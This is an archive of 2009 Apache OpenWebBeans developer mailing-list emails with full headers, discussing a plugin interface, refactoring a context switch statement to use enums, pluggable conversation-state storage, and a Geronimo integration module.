b=V0IS2HMxtxDgQiL1vpaLolAFVC5SFGhCJoOBA9ZUZJ+mTFK1K8OPFnmmuSbqe5h2YT53D+H4Na52muELdbWe3FWTXP2oy82Nb295JvaKTNeiCLZXMt6Twm4F3IrZfxcM/kQ6kXN43IdsRz40HdVbcM+unC5jnTyBz9vr/3mPKtw=; Message-ID: <[email protected]> X-YMail-OSG: uPO_Yr4VM1lS8dSnKna_.iYy2_WiFudFuHiXcUO.jHLgGW9vVxxICnqCqzuq4VODeYCjJxATw5aZgUglPNZTDRasQZO5disjAGsWvP95nMqs10xN2MXrIWC26ytq6FuaBM0qBfn_RYY3yuoeEQ3ugTqkrUEWo3ZvDys1hakiRVGRH1PC2_4UzkBeIp.ta7b0dB.NzI1wIlmfxHRYLsudDCTTbU8iEcCBKwbfuCwS8rcCTzNlagP8fdrN6jfUnmULBQ1wib2VZtkorf_uTHSbqB.kreptDxmU_tNATsdcVKPxt_rhEGyIubyarszs4UCD5H2SkFv_.WBepyGS5Uyeed54bAwpCZ5_uDaTDxs- Received: from [161.129.204.104] by web38202.mail.mud.yahoo.com via HTTP; Mon, 15 Jun 2009 22:24:57 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.15 References: <[email protected]> <[email protected]> Date: Mon, 15 Jun 2009 22:24:57 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: EJB Classes Required in non-EJB environment... To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1933879210-1245129897=:46288" X-Virus-Checked: Checked by ClamAV on apache.org --0-1933879210-1245129897=:46288 Content-Type: text/plain; charset=us-ascii I am getting this discussion to dev@ list. Actually, plugin interface is so generic (means start, shutdown etc.) , so it is necessary to add some special methods for other plugins work correctly. For example, while I was adding support for JMS beans, I will add another interface method into the plugin interface, "addJmsBean()." So whenever, there is an injection point for JMS components, plugins creates a new JMS bean and add it to the container. Code: In DefinitionUtil class public static void addImplicitComponentForInjectionPoint(InjectionPoint injectionPoint) { ..... if(injectionPointType instanceof Class) { List<OpenWebBeansPlugin> plugins = PluginLoader.getInstance().getPlugins(); for(OpenWebBeansPlugin plugin : plugins) { if(plugin.addJMSBean(injectionPoint)) { break; } } } I do not think so much about the EJB plugin functionality. I will be on the #freenode at the evening. Maybe we discuss general plugin functionality of the current state and next steps to implement new draft. Thanks; --Gurkan ________________________________ From: James Carman <[email protected]> To: [email protected] Sent: Tuesday, June 16, 2009 12:49:19 AM Subject: Re: EJB Classes Required in non-EJB environment... On Mon, Jun 15, 2009 at 5:17 PM, Mark Struberg<[email protected]> wrote: > > Hi James! > > I really appreciate your comments! > I thought about this when I wrote it and I think it is kind of a chicken-egg problem: > How should the registration get started? You would instantiate the plugins the same way you do now. You'd just have an startup() method that takes some object that allows you to register stuff on it (new contexts, dependency providers, etc.). --0-1933879210-1245129897=:46288-- From [email protected] Tue Jun 16 05:26:14 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89637 invoked from network); 16 Jun 2009 05:26:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2009 05:26:14 -0000 Received: (qmail 19355 invoked by uid 500); 16 Jun 2009 05:26:26 -0000 Delivered-To: [email protected] Received: (qmail 19328 invoked by uid 500); 16 Jun 2009 05:26:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19318 invoked by uid 99); 16 Jun 2009 05:26:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Jun 2009 05:26:26 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38207.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 16 Jun 2009 05:26:16 +0000 Received: (qmail 22367 invoked by uid 60001); 16 Jun 2009 05:25:55 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1245129955; bh=vRd+rHg6HUniD3lh/8yaE+7UF+Zvre2x+R7QYlkBUSM=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=rg3n++3bAyzsbDIt18LIWH222KvRq4evvugNk/h2dQVyisfAPE2KWPj9EJZXSGQUuQEI0PZuzLbFySZeVZtnMxHaVunkTglsLMaTjqDJFd3AEzDsS8GtEFnB85ZhmjwStZYIw4xQO5c9XMS47sw9FSqUQHQFw5A5JOwesc2RVkA= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=xCUUngmCOrK6PhSV9+YYoZhPzoa7bg6UyyosJrrBqhg9ZKulW3dJgflXiQ/tvcZe5CZCWOE1NAeS1otZZ6tUUdoo5ZNT1hwgAEXisMYKIKbnyYoi7cslfluqzkLPB24+TZAofnUqSwju3BqPcg7jzUxX7SNO0DFbqsKcQDeCST4=; Message-ID: <[email protected]> X-YMail-OSG: Kp5.fScVM1kMI972irHpmzpuZL0oYg7ye8BEELBf6BFB8RM.efR5eiNUVXeEG4hEQnmNyurzu66Wuu_ICdQ9vL4AZhJb.nADf6wLCiCfgJu4YiObStSHqJ65NywFva.h9ZpN5G0Xk475VNTXMKMdMGe0RAJl4BGwexA9bwYW26UxxIz.Ck3toFDkkRm1CA6YBRGDs6wJIsBuAc_IH1hgO7yLuJ6IexkuWhEO4JIP13ocRXfJu3s0zYS7I4lk4As6QtH04nyMNO5xh6gDT839FvnWrZ1zt0lFgtXJZDCSB__ZmQ6ktNcUDx4QoiHbliWwMsr88InGA4BowVifWQgwYE8tgSzOb3V5BgN8WPI- Received: from [161.129.204.104] by web38207.mail.mud.yahoo.com via HTTP; Mon, 15 Jun 2009 22:25:55 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.15 References: <[email protected]> Date: Mon, 15 Jun 2009 22:25:55 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: ContextFactory switch statements... To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1082700167-1245129955=:21906" X-Virus-Checked: Checked by ClamAV on apache.org --0-1082700167-1245129955=:21906 Content-Type: text/plain; charset=us-ascii Yes. Please create a jira and attach patch :) Thanks; --Gurkan ________________________________ From: James Carman <[email protected]> To: [email protected] Sent: Tuesday, June 16, 2009 4:58:10 AM Subject: ContextFactory switch statements... In the code for org.apache.webbeans.context.ContextFactory, we currently have: switch (type.getName()) { case 0: context = getRequestContext(); break; case 1: context = getSessionContext(); break; case 2: context = getApplicationContext(); break; case 3: context = getConversationContext(); break; case 4: context = getDependentContext(); break; default: throw new IllegalArgumentException("There is no such a standard context with name id=" + type.getName()); } This should be changed to (the Java language supports switching on enum values): switch (type) { case REQUEST: context = getRequestContext(); break; case SESSION: context = getSessionContext(); break; case APPLICATION: context = getApplicationContext(); break; case CONVERSATION: context = getConversationContext(); break; case DEPENDENT: context = getDependentContext(); break; default: throw new IllegalArgumentException("There is no such a standard context with name id=" + type.getName()); } This is much more readable. --0-1082700167-1245129955=:21906-- From [email protected] Thu Jun 18 13:03:41 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98003 invoked from network); 18 Jun 2009 13:03:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 13:03:41 -0000 Received: (qmail 32447 invoked by uid 500); 18 Jun 2009 13:03:52 -0000 Delivered-To: [email protected] Received: (qmail 32422 invoked by uid 500); 18 Jun 2009 13:03:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32292 invoked by uid 99); 18 Jun 2009 13:03:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 13:03:52 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f179.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 13:03:43 +0000 Received: by qyk9 with SMTP id 9so1313057qyk.32 for <[email protected]>; Thu, 18 Jun 2009 06:03:22 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f9mr274756qcn.78.1245330202076; Thu, 18 Jun 2009 06:03:22 -0700 (PDT) From: James Carman <[email protected]> Date: Thu, 18 Jun 2009 09:03:02 -0400 Message-ID: <[email protected]> Subject: Pluggable State Storage Mechanism... To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org All, It would be great if we could make the conversational state storage mechanism "pluggable" so that you could perhaps keep the memory footprint of your conversational state at a minimum. What do you guys think about that? James From [email protected] Thu Jun 18 13:54:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37012 invoked from network); 18 Jun 2009 13:54:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 13:54:17 -0000 Received: (qmail 42690 invoked by uid 500); 18 Jun 2009 13:54:29 -0000 Delivered-To: [email protected] Received: (qmail 42677 invoked by uid 500); 18 Jun 2009 13:54:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42667 invoked by uid 99); 18 Jun 2009 13:54:29 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 13:54:29 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 13:54:19 +0000 Received: by ewy20 with SMTP id 20so1327881ewy.12 for <[email protected]>; Thu, 18 Jun 2009 06:53:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=/nP505u+9YXO4Ttg4rw6ySoAp8T/UcFv3wOaew4EhD0=; b=qj5keB0q8etsJoMXLCdFNE7aieW7mt30xvSCLsi3KhSuB+XgUthjKupvhlcaB4rQZ8 sVxYdJlH/llZtSvv5C+ECe2dBOyR8N3xay+P1IRquXmpwcUrF229JbQAXc6L4TZbtkbn M/frM3U40bIAoHgVdpjTPJu0tecuUjPggO0vw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=wwanysjCzeKTCeaHmFunqL7ZQ4sG8O6h3Ms0VxtihlB7KDxImTivJEMDDXt9Fm5OIh nznvHOYcTOU7OkLEkRkIcNdFRKzYmBcw3BXOg4TQC9zxaU86/rPHg6SOnZ0ONfSKkWOk 38zgFM3nkrCONrZxKUhQ86aEnTYpcZ9DG2HLk= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a20mr1815047eba.67.1245333239476; Thu, 18 Jun 2009 06:53:59 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 18 Jun 2009 16:53:59 +0300 Message-ID: <[email protected]> Subject: Re: Pluggable State Storage Mechanism... From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c0df05db0fc046c9fbda0 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c0df05db0fc046c9fbda0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit It is a good idea and it could be an OWB extension. Could you create a Jira for this? But I think, firstly we have to adapt the last draft specification requirements to our implementation :) Thanks; /Gurkan 2009/6/18 James Carman <[email protected]> > All, > > It would be great if we could make the conversational state storage > mechanism "pluggable" so that you could perhaps keep the memory > footprint of your conversational state at a minimum. What do you guys > think about that? > > James > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c0df05db0fc046c9fbda0-- From [email protected] Thu Jun 18 13:59:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41603 invoked from network); 18 Jun 2009 13:59:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 13:59:50 -0000 Received: (qmail 60128 invoked by uid 500); 18 Jun 2009 14:00:01 -0000 Delivered-To: [email protected] Received: (qmail 60110 invoked by uid 500); 18 Jun 2009 14:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60100 invoked by uid 99); 18 Jun 2009 14:00:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 14:00:01 +0000 X-ASF-Spam-Status: No, hits=3.4 required=10.0 tests=HTML_MESSAGE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 13:59:53 +0000 Received: by qw-out-1920.google.com with SMTP id 9so583189qwj.54 for <[email protected]>; Thu, 18 Jun 2009 06:59:32 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f9mr284999qcn.78.1245333572217; Thu, 18 Jun 2009 06:59:32 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> From: James Carman <[email protected]> Date: Thu, 18 Jun 2009 09:59:12 -0400 Message-ID: <[email protected]> Subject: Re: Pluggable State Storage Mechanism... To: [email protected] Content-Type: multipart/alternative; boundary=00163642719e32efad046c9fd1f3 X-Virus-Checked: Checked by ClamAV on apache.org --00163642719e32efad046c9fd1f3 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Understood. I don't want to get our "cart before our horse" here, but I did want to raise the idea. I think providing a Terracotta implementation might be wise (they did this for Wicket's page storage mechanism). You could even use ehcache, I would assume. On Thu, Jun 18, 2009 at 9:53 AM, Gurkan Erdogdu <[email protected]>wrote: > It is a good idea and it could be an OWB extension. Could you create a Jira > for this? > > But I think, firstly we have to adapt the last draft specification > requirements to our implementation :) > > Thanks; > > /Gurkan > > 2009/6/18 James Carman <[email protected]> > > > All, > > > > It would be great if we could make the conversational state storage > > mechanism "pluggable" so that you could perhaps keep the memory > > footprint of your conversational state at a minimum. What do you guys > > think about that? > > > > James > > > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > --00163642719e32efad046c9fd1f3-- From [email protected] Thu Jun 18 14:43:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76981 invoked from network); 18 Jun 2009 14:43:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 14:43:19 -0000 Received: (qmail 74643 invoked by uid 500); 18 Jun 2009 14:43:30 -0000 Delivered-To: [email protected] Received: (qmail 74632 invoked by uid 500); 18 Jun 2009 14:43:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74622 invoked by uid 99); 18 Jun 2009 14:43:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 14:43:30 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 14:43:22 +0000 Received: by ewy20 with SMTP id 20so1364947ewy.12 for <[email protected]>; Thu, 18 Jun 2009 07:43:00 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=2j1tmhPKgw+jAJBJ1rAgQ++hDh2QbpQhgRps3FNaSKo=; b=FBWRQ+0gq23uqk/1T011AUtX5+vkKSiqL12AiGnQuLEvKbPtD4/5TMPm6Ta3wEsMC7 HQmxXJkFf2eXE8XrKPRcICC34Lf1cnJIguKN85dcHUj+TZ6Bu40IxtoPnctDXws/g8oQ 0nxPrc0ea0zCJGX5kR9xNSHVVLkHHxlc2ZUks= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=WjBRtijXj+xIGiJ8mTAdLSmwZkG5WSFtKqjGhzIq1jdDP6aP9DdTOAc8p75DusZVIQ kNA7+o+Piy4M0J5ILdTLNT411tNnW7doHwNOciTDrCP5zdU9IMPoyVYHXcwTtNNZqxd2 dYuBi9N42tdWkZgvMSgAdwoDojSRoPKZiiU9c= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id d10mr1876618ebd.84.1245336180768; Thu, 18 Jun 2009 07:43:00 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Thu, 18 Jun 2009 17:43:00 +0300 Message-ID: <[email protected]> Subject: Re: Pluggable State Storage Mechanism... From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174bdc70ae4190046ca06ca2 X-Virus-Checked: Checked by ClamAV on apache.org --0015174bdc70ae4190046ca06ca2 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit AFAIK, Terracotta provides distributed cache for multiple nodes. And generally it is used for saving user sessions for fail-over scenarios. Does wicket use it for clustering page data? Actually, we have not implemented the session related scenarios like activation/passivation of the sessions. For example, when container passivates session, passivation occurs and OWB will passivate all component instances that have passivated capable scope types (like session and conversation scopes). I think that this can be easily done by implementing the HttpSessionActiovationListener. Gurkan 2009/6/18 James Carman <[email protected]> > Understood. I don't want to get our "cart before our horse" here, but I > did > want to raise the idea. I think providing a Terracotta implementation > might > be wise (they did this for Wicket's page storage mechanism). You could > even > use ehcache, I would assume. > > On Thu, Jun 18, 2009 at 9:53 AM, Gurkan Erdogdu <[email protected] > >wrote: > > > It is a good idea and it could be an OWB extension. Could you create a > Jira > > for this? > > > > But I think, firstly we have to adapt the last draft specification > > requirements to our implementation :) > > > > Thanks; > > > > /Gurkan > > > > 2009/6/18 James Carman <[email protected]> > > > > > All, > > > > > > It would be great if we could make the conversational state storage > > > mechanism "pluggable" so that you could perhaps keep the memory > > > footprint of your conversational state at a minimum. What do you guys > > > think about that? > > > > > > James > > > > > > > > > > > -- > > Gurkan Erdogdu > > http://gurkanerdogdu.blogspot.com > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174bdc70ae4190046ca06ca2-- From [email protected] Thu Jun 18 14:46:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78264 invoked from network); 18 Jun 2009 14:46:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 14:46:21 -0000 Received: (qmail 79915 invoked by uid 500); 18 Jun 2009 14:46:32 -0000 Delivered-To: [email protected] Received: (qmail 79888 invoked by uid 500); 18 Jun 2009 14:46:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79878 invoked by uid 99); 18 Jun 2009 14:46:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 14:46:32 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 14:46:24 +0000 Received: by qw-out-1920.google.com with SMTP id 9so603715qwj.54 for <[email protected]>; Thu, 18 Jun 2009 07:46:03 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id n7mr275709qck.87.1245336363175; Thu, 18 Jun 2009 07:46:03 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: James Carman <[email protected]> Date: Thu, 18 Jun 2009 10:45:43 -0400 Message-ID: <[email protected]> Subject: Re: Pluggable State Storage Mechanism... To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Thu, Jun 18, 2009 at 10:43 AM, Gurkan Erdogdu<[email protected]> wrote: > AFAIK, Terracotta provides distributed cache for multiple nodes. And > generally it is used for saving =A0user sessions for fail-over scenarios.= Does > wicket use it for clustering page data? > Yes, there is terracotta support for wicket page state, so that it replicates across nodes. Pretty slick from what I understand, but I haven't had a chance to use it yet. > Actually, we have not implemented the session related scenarios like > activation/passivation of the sessions. For example, when container > passivates session, passivation occurs and OWB will passivate all compone= nt > instances that have passivated capable scope types (like session and > conversation scopes). I think that this can be easily done by implementin= g > the HttpSessionActiovationListener. I would assume so, yes. From [email protected] Fri Jun 19 05:45:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76688 invoked from network); 19 Jun 2009 05:45:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 05:45:56 -0000 Received: (qmail 88124 invoked by uid 500); 19 Jun 2009 05:46:07 -0000 Delivered-To: [email protected] Received: (qmail 88099 invoked by uid 500); 19 Jun 2009 05:46:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88089 invoked by uid 99); 19 Jun 2009 05:46:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 05:46:07 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27808.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 19 Jun 2009 05:45:54 +0000 Received: (qmail 54049 invoked by uid 60001); 19 Jun 2009 05:45:32 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1245390332; bh=yH7wcW0sSQ5wuDWaRXGAGglRA71wyOBvlwgWnGyLvQg=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=BZHauT8Meyqdr8rd9WVYuVNJ6zwrKSFRAotbN1AxkB6Q4t+Az9mum7m8IcIT2RaQpbe2g5GuCtvfRBAWuh670vpAo9aCIiqJqJ/mUa9qn+2kz6knCjPN8mWBdJM1+TYhLQtTGM58ClSw/cAXN9WLWQSM8sBFLyaHB3Si48h4TKM= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=aXS8fU4lUtt1PnIM5FVa5/ccDyBLPi9V32AVz5ej+EtjLt8dSdgT079lh+GljUyICerI/Qc1KVzIgXvSVU/VfL6w8UvHKDI4Ta+HBASFJ5u7OxKpuKpQWj5eknMOVOiYHlIZotusNx2Ym+qArhFRJx1Vu2CdL7dplhzNpHOUJ7Y=; Message-ID: <[email protected]> X-YMail-OSG: RSGDYucVM1mf9O_VOkAlEDFjZjA6F84Orw8KwKIdYnDTcb5UWZ_FCnMtS3wLOELuibwEC6z9szSKaFKcR0EA5WqMJDjZOYcE5dw7jzGw24ehvEJNP8HDjD2iG3NB7px_LxM0DpWB25gCzPZoxlRw9d8vxizLBpTTxmcjCRS4Hi1lNNzjdussO3L.bWxyWPDoNaudXdkNca9rJvquWElnVBlFadLC2nyLdEFY7bMDBW63BMKwLz4LRpcN6ahMygzU4f_hbctRXE6qbGVUHgArIhFuOEPviJIbXwfJUuQMOSSA1i9Ke06h0R4bMhZWAWNxBqpkvrioCg47oZwZcDppXKlkeNls7fbn2M1OkA-- Received: from [161.129.204.104] by web27808.mail.ukl.yahoo.com via HTTP; Fri, 19 Jun 2009 05:45:32 GMT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Fri, 19 Jun 2009 05:45:32 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: AW: svn commit: r786229 - in /incubator/openwebbeans/trunk/webbeans-geronimo: ./ src/main/java/org/apache/webbeans/spi/ee/openejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/ejb/ src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/ src/test/java/org... To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi Gurkan! The webbeans-geronimo package is a bit of a compromise. The whole geronimo integration should really been done on the geronimo side= , but it is simply too early and would cause too much effort now for this s= tep. So I started this package here to have all in one place so we can test= and get it stable and later hand it over to the geronimo guys.=20 The reason why I don't think this module should stay there is geronimos lif= ecycle. This is a chicken egg problem with dependencies. Clearly geronimo u= ses us and we use openejb. So we may have different branches for different = openejb versions to integrate. But the integration into geronimo should fin= ally been done on the geronimo side imho.=20 I write this, so all have a common understanding what this module was origi= nally intended for. lieGrue, strub=20 --- [email protected] <[email protected]> schrieb am Do, 18.6.2009: > Von: [email protected] <[email protected]> > Betreff: svn commit: r786229 - in /incubator/openwebbeans/trunk/webbeans-= geronimo: ./ src/main/java/org/apache/webbeans/spi/ee/openejb/ src/main/jav= a/org/apache/webbeans/spi/ee/openejb/ejb/ src/main/java/org/apache/webbeans= /spi/ee/openejb/jpa/ src/test/java/org... > An: [email protected] > Datum: Donnerstag, 18. Juni 2009, 21:51 > Author: gerdogdu > Date: Thu Jun 18 19:51:03 2009 > New Revision: 786229 >=20 > URL: http://svn.apache.org/viewvc?rev=3D786229&view=3Drev > Log: > Adding package for EJB stuff. Maybe we can add EJB > integration code here. >=20 > Added: > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/ejb/ > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/ > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > =A0 =A0 =A0 - copied, changed from r782277, > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > Removed: > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > Modified: > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/pom.xml > =A0 =A0 > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > =A0 =A0 > 